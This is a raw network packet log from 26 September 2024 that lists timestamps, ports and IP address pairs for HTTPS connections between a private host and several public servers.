Sep 26, 2024 17:55:37.466578960 CEST	49812	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.466686010 CEST	443	49812	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.466753960 CEST	49812	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.467178106 CEST	443	49812	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.467221975 CEST	443	49812	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.467236996 CEST	49812	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.467274904 CEST	49812	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.471580982 CEST	49812	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.471595049 CEST	443	49812	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.474852085 CEST	443	49811	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.474896908 CEST	443	49811	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.474939108 CEST	49811	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.474961996 CEST	443	49811	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.474977970 CEST	49811	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.475018024 CEST	49811	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.475173950 CEST	443	49811	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.475224018 CEST	49811	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.475292921 CEST	443	49811	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.475333929 CEST	443	49811	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.475402117 CEST	49811	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.475477934 CEST	49811	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.475490093 CEST	443	49811	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.481642962 CEST	443	49810	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.481690884 CEST	443	49810	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.481703043 CEST	49810	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.481719971 CEST	443	49810	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.481751919 CEST	49810	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.481790066 CEST	49810	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.482227087 CEST	443	49810	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.482280016 CEST	49810	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.482489109 CEST	443	49810	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.482527018 CEST	443	49810	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.482541084 CEST	49810	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.482572079 CEST	49810	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.482578993 CEST	443	49810	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.482587099 CEST	49810	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.482587099 CEST	49810	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.482635975 CEST	49810	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.563203096 CEST	49683	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:37.627490044 CEST	443	49813	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:37.627516985 CEST	443	49813	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:37.627533913 CEST	443	49813	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:37.627574921 CEST	49813	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:37.627588987 CEST	443	49813	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:37.627614021 CEST	49813	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:37.627625942 CEST	443	49813	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:37.627639055 CEST	443	49813	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:37.627655029 CEST	49813	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:37.627701044 CEST	49813	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:37.631500959 CEST	49813	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:37.631517887 CEST	443	49813	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:37.633524895 CEST	49816	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:37.633569956 CEST	443	49816	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:37.633649111 CEST	49816	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:37.633865118 CEST	49816	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:37.633879900 CEST	443	49816	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:37.732732058 CEST	443	49814	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.732837915 CEST	49814	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.733359098 CEST	49814	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.733370066 CEST	443	49814	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.733633995 CEST	49814	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.733640909 CEST	443	49814	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.733783960 CEST	49814	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.733804941 CEST	443	49814	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.734026909 CEST	49814	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.734038115 CEST	443	49814	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.857142925 CEST	443	49815	204.79.197.222	192.168.2.16
Sep 26, 2024 17:55:37.857245922 CEST	49815	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:37.860557079 CEST	49815	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:37.860567093 CEST	443	49815	204.79.197.222	192.168.2.16
Sep 26, 2024 17:55:37.860708952 CEST	49815	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:37.860716105 CEST	443	49815	204.79.197.222	192.168.2.16
Sep 26, 2024 17:55:37.860959053 CEST	443	49815	204.79.197.222	192.168.2.16
Sep 26, 2024 17:55:37.861028910 CEST	49815	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:37.958133936 CEST	443	49814	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.958204031 CEST	49814	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.958209038 CEST	443	49814	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.958262920 CEST	49814	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.958292961 CEST	49814	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.958309889 CEST	443	49814	204.79.197.200	192.168.2.16
Sep 26, 2024 17:55:37.958323002 CEST	49814	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.958359003 CEST	49814	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:37.970575094 CEST	443	49815	204.79.197.222	192.168.2.16
Sep 26, 2024 17:55:37.970673084 CEST	49815	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:37.970752954 CEST	443	49815	204.79.197.222	192.168.2.16
Sep 26, 2024 17:55:37.970822096 CEST	49815	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:37.970956087 CEST	443	49815	204.79.197.222	192.168.2.16
Sep 26, 2024 17:55:37.971018076 CEST	49815	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:37.971890926 CEST	443	49815	204.79.197.222	192.168.2.16
Sep 26, 2024 17:55:37.971966028 CEST	49815	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:37.976222992 CEST	443	49815	204.79.197.222	192.168.2.16
Sep 26, 2024 17:55:37.976301908 CEST	49815	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:38.061119080 CEST	443	49815	204.79.197.222	192.168.2.16
Sep 26, 2024 17:55:38.061207056 CEST	49815	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:38.061218023 CEST	443	49815	204.79.197.222	192.168.2.16
Sep 26, 2024 17:55:38.061275005 CEST	49815	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:38.061297894 CEST	443	49815	204.79.197.222	192.168.2.16
Sep 26, 2024 17:55:38.061351061 CEST	49815	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:38.061413050 CEST	49815	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:38.061425924 CEST	443	49815	204.79.197.222	192.168.2.16
Sep 26, 2024 17:55:38.061443090 CEST	49815	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:38.061594009 CEST	49815	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:38.140542030 CEST	443	49816	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:38.140769958 CEST	49816	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:38.141242027 CEST	49816	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:38.141252041 CEST	443	49816	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:38.141458988 CEST	49816	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:38.141463995 CEST	443	49816	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:38.169214964 CEST	49683	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:38.294270039 CEST	443	49816	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:38.294300079 CEST	443	49816	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:38.294341087 CEST	49816	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:38.294357061 CEST	443	49816	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:38.294368029 CEST	443	49816	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:38.294373989 CEST	49816	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:38.294431925 CEST	49816	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:38.295579910 CEST	49816	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:38.295594931 CEST	443	49816	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:38.297696114 CEST	49817	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:38.297738075 CEST	443	49817	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:38.297914982 CEST	49817	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:38.298103094 CEST	49817	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:38.298113108 CEST	443	49817	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:38.583209991 CEST	49680	80	192.168.2.16	192.229.211.108
Sep 26, 2024 17:55:38.759325981 CEST	49681	443	192.168.2.16	51.104.15.253
Sep 26, 2024 17:55:38.794749022 CEST	443	49817	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:38.794943094 CEST	49817	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:38.795372963 CEST	49817	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:38.795387983 CEST	443	49817	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:38.795624971 CEST	49817	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:38.795629978 CEST	443	49817	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:38.933454037 CEST	443	49817	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:38.933491945 CEST	443	49817	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:38.933516979 CEST	443	49817	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:38.933559895 CEST	49817	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:38.933587074 CEST	443	49817	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:38.933602095 CEST	49817	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:38.933619022 CEST	49817	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:38.933749914 CEST	49817	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:39.017383099 CEST	443	49817	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:39.017471075 CEST	443	49817	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:39.017491102 CEST	49817	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:39.017560005 CEST	49817	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:39.017560005 CEST	49817	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:39.017574072 CEST	443	49817	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:39.017731905 CEST	49817	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:39.019773006 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:39.019808054 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:39.019988060 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:39.020134926 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:39.020143986 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:39.378292084 CEST	49683	443	192.168.2.16	204.79.197.222
Sep 26, 2024 17:55:39.528604031 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:39.532604933 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:39.534706116 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:39.534717083 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:39.536719084 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:39.536724091 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:39.748866081 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:39.748898983 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:39.748914003 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:39.748940945 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:39.748970985 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:39.748984098 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:39.749034882 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:39.749597073 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:39.749651909 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:39.749656916 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:39.749718904 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:39.751800060 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:39.751818895 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:39.751883984 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:39.751889944 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:39.751946926 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:39.758676052 CEST	49675	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:39.758816004 CEST	49677	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:39.760220051 CEST	49674	443	192.168.2.16	204.79.197.200
Sep 26, 2024 17:55:40.066335917 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.066353083 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.066442013 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.066471100 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.066509008 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.066795111 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.066812992 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.066871881 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.066875935 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.066962004 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.067322969 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.067338943 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.067433119 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.067436934 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.067500114 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.068089962 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.068106890 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.068211079 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.068217039 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.068298101 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.071430922 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.071454048 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.071552992 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.071558952 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.071605921 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.071742058 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.071834087 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.071836948 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.071871042 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.072664976 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.072683096 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.072742939 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.072746992 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.072802067 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.072830915 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.073262930 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.073430061 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.073432922 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.073486090 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.073688984 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.073704004 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.073767900 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.073771954 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.073811054 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.073853970 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.074598074 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.074665070 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.074668884 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.074707031 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.076425076 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.076441050 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.076498032 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.076505899 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.076539993 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.076606989 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.076657057 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.076662064 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.076694965 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.076970100 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.076984882 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.077034950 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.077040911 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.077075958 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.077091932 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.077457905 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.077516079 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.077522039 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.077572107 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.077955961 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.077970028 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.078016996 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.078022003 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.078052044 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.078087091 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.078681946 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.078758955 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.078763008 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.078819990 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.079504013 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.079519033 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.079574108 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.079580069 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.079607964 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.079628944 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.080035925 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.080106974 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.080111027 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.080167055 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.080998898 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.081017017 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.081075907 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.081082106 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.081120014 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.081329107 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.081387997 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.081393957 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.081439018 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.082310915 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.082325935 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.082353115 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.082382917 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.082386971 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.082442999 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.093925953 CEST	49819	443	192.168.2.16	150.171.85.254
Sep 26, 2024 17:55:40.093981028 CEST	443	49819	150.171.85.254	192.168.2.16
Sep 26, 2024 17:55:40.094052076 CEST	49819	443	192.168.2.16	150.171.85.254
Sep 26, 2024 17:55:40.094429970 CEST	49819	443	192.168.2.16	150.171.85.254
Sep 26, 2024 17:55:40.094448090 CEST	443	49819	150.171.85.254	192.168.2.16
Sep 26, 2024 17:55:40.107949018 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.107969046 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.108045101 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.108063936 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.108108997 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.108206987 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.108253002 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.108259916 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.108300924 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.108561993 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.108577013 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.108635902 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.108643055 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.108686924 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.109127045 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.109196901 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.109201908 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.109244108 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.109793901 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.109808922 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.109850883 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.109863043 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.109869957 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.109893084 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.109922886 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.110527992 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.110542059 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.110609055 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.110615015 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.110663891 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.110793114 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.110853910 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.110858917 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.110897064 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.111128092 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.111141920 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.111216068 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.111221075 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.111264944 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.111840010 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.111886978 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.111910105 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.111913919 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.111948013 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.111960888 CEST	49818	443	192.168.2.16	23.1.33.206
Sep 26, 2024 17:55:40.111963987 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.111974955 CEST	443	49818	23.1.33.206	192.168.2.16
Sep 26, 2024 17:55:40.112004995 CEST	49818	443	192.168.2.16	23.1.33.206
